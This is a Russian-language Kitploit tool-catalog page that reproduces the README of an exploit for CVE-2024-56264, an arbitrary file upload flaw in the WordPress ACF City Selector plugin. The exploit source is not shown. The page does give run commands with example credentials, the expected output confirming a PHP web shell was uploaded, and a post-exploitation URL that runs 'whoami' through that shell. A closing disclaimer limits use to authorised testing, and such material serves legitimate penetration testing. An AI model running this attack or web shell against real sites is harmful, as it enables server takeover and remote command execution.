Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-56264 — Плагин WordPress ACF City Selector <= 1.14.0 - Уязвимость произвольной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-56264
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2024-56264

CVE-2024-56264

Плагин WordPress ACF City Selector <= 1.14.0 - Уязвимость произвольной загрузки файлов

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-56264

WordPress ACF City Selector — Эксплойт произвольной загрузки файлов (CVE-2024-56264)

Обзор

Этот репозиторий содержит эксплойт для CVE-2024-56264 — уязвимости произвольной загрузки файлов, обнаруженной в плагине WordPress ACF City Selector (версии <= 1.14.0). Эта уязвимость позволяет злоумышленнику загрузить вредоносный PHP-файл (веб-шелл) на уязвимый экземпляр WordPress и выполнять произвольные команды на сервере.

Детали CVE

  • CVE ID: CVE-2024-56264
  • Дата публикации: 2 января 2025 г.
  • Затронутый плагин: ACF City Selector
  • Уязвимые версии: <= 1.14.0
  • Воздействие: Удалённое выполнение кода (RCE) через неограниченную загрузку файлов

Описание

Плагин ACF City Selector некорректно проверяет загружаемые файлы, что позволяет злоумышленникам обходить ограничения и загружать произвольные PHP-файлы. После загрузки вредоносного PHP-файла злоумышленник может удалённо выполнять системные команды, что приводит к .

полной компрометации сервера

Требования

📌 Зависимости

Перед запуском скрипта убедитесь, что установлены следующие компоненты:

  • Python 3.x
  • Модуль requests (установка: pip install requests)

Все необходимые зависимости можно установить с помощью:

root@kitploit:~
pip install -r requirements.txt

🚀 Использование

Запуск эксплойта:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

Пример:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

Ожидаемый результат

При успешной эксплуатации вы должны увидеть:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

Постэксплуатация

При успехе доступ к загруженному шеллу осуществляется по адресу:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

Это позволяет удалённо выполнять команды на сервере.

⚠ Предупреждение

Данный скрипт предназначен только для образовательных и авторизованных тестов безопасности. Несанкционированное использование незаконно и может повлечь серьёзные последствия. Автор не несёт ответственности за любое неправомерное использование этого эксплойта.

Скачать инструмент